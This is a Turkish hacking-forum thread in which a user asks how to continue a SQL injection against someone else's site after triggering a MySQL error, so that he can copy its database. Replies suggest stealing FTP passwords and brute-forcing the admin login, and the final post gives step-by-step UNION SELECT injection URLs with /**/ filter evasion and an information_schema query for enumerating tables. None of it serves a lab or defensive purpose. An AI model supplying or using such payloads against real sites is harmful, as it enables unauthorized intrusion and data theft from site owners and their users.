Forum
Aktif konular
Üyeler
Kurallar
Arama
Tahribat.com Forumları 
Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri 
Hata Aldım Fakat İlerleye Bilirmiyim (Sql İnjection) Hata Aldım Fakat İlerleye Bilirmiyim (Sql İnjection)
-
arkadaşlar sql injection yapacam :D çok mühim zarar değil sadece adamların kullanıma açık veri tabanlarındaki bilgiyi topluca almak istiyorum şimdi sayfa php
ve id li bir kısım bulup 'a yaptım adres satırında
Sorgu yapılamıyor. (SELECT UPPER(owner) as owner FROM g_maincat WHERE id=3\'a ORDER BY id ASC)
(You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'a ORDER BY id ASC' at line 1)diye bir hata virdi bundan ilerisine gidilebilinirmi gidilirse nasıl ip ucu vereblürmisiniz
-
hacı unclosed hatası alman gerekli
-
database elde etmenin başka yolu warmı misal verileri uzaktan çekip listeleyip kendi db mi oluşturabilirmiyim yada başka bir yöntem
edüt : admin logininide buldum ama sql yemedi :D
-
hacı sql injectiondan önce sql dilini ögrenmen gerekmez mi :)) bu sayede ezber deilde komutların nasıl ve ne amacla calı$tıgını anlarsın :)
-
haklısın aslında sql i işte copy paste yapıyoz sql örenmeden injection yaparak sonuca gitmeye çalışıyorum fekat zaman ve mekan kısıtlı olunca böyle sonuçlar çıkıyo
-
muahahh ne biçim site öyle herşey açık :)
bakkal sitesimi :P
-
yawuz bunu yazdı:
-----------------------------database elde etmenin başka yolu warmı misal verileri uzaktan çekip listeleyip kendi db mi oluşturabilirmiyim yada başka bir yöntem
edüt : admin logininide buldum ama sql yemedi :D
-----------------------------
ftp şifresini çalabilirsin veya servera girebilirsin falan filan öptüm -
yok bakkal çakkal sitesi değil aslında server a uzaktan erişim kapalı yani ftp gibi yada host paneli gibi bi dalga yok fekat online içerik yönetimi için bir giriş var admin yazınca çıktı saolsun :D şimdi şifre deniyorum fekat sonuç alamadım
edit : kaynağı görüntüle dediğimde post ettiği sayfa gene benim bulunduğum sayfa burdan bişeler bulabilirmiyik
edit 2 : Apache/1.3.34 Server peki Apache serverin bir açığı olabilirmi
-
MySQL sanırım fazla bişey yapamazsın eğer mssql olsaydı bide unlclosed verseydi her sey guzel olurdu ? 1 haftadır bi turk server dayım adamları uyarıorum kapatmıolar acıgı tam 453 site var sistemde
-
Herkes unclosed yazması lazım falan demiş ama yazmasına gerek yok bence. unclosed yazdığında update falan yapılır veya bi siteye yönlendirebilirsin ama bu farklı bir konu.
Sana tavsiyem şöyle birşey dene :
http://siteninadı.com/uzantısı.php?id=-1/**/union/**/all/**/select/**/1 /*
Eğer bu isteğe colon sayısı tutmuyor uyarısı verirse ensonda ki 1 in yanına virgün koyarak karşına bir tablo çıkana kadar sayıları tutturmaya çalışmalısın
http://siteninadı.com/uzantısı.php?id=-1/**/union/**/all/**/select/**/1,2 /* enter yap
http://siteninadı.com/uzantısı.php?id=-1/**/union/**/all/**/select/**/1,2,3 /* enter yap
Gibi..
Eğer karşına bir tablo çıkarsa şunu yazarak tablo adları öğreniliyor mu öğrenilmiyor mu bir dene
-1/**/union/**/all/**/select/**/1,2,3,4,5,6+from+information_schema.tables+limit=192,1 /*
1,2,3,4,5,6 sayısı senin sitede bulduğun sayıya göre değişir ben öylesine bir örnek olarak verdim.
Bunlara olumlu sonuç alırsan tekrar yaz devamını getirelim :) boşuna yazmıyım okadar şeyi
Kısayol
Şikayet
Özel Mesaj
Alıntı yap
Cevapla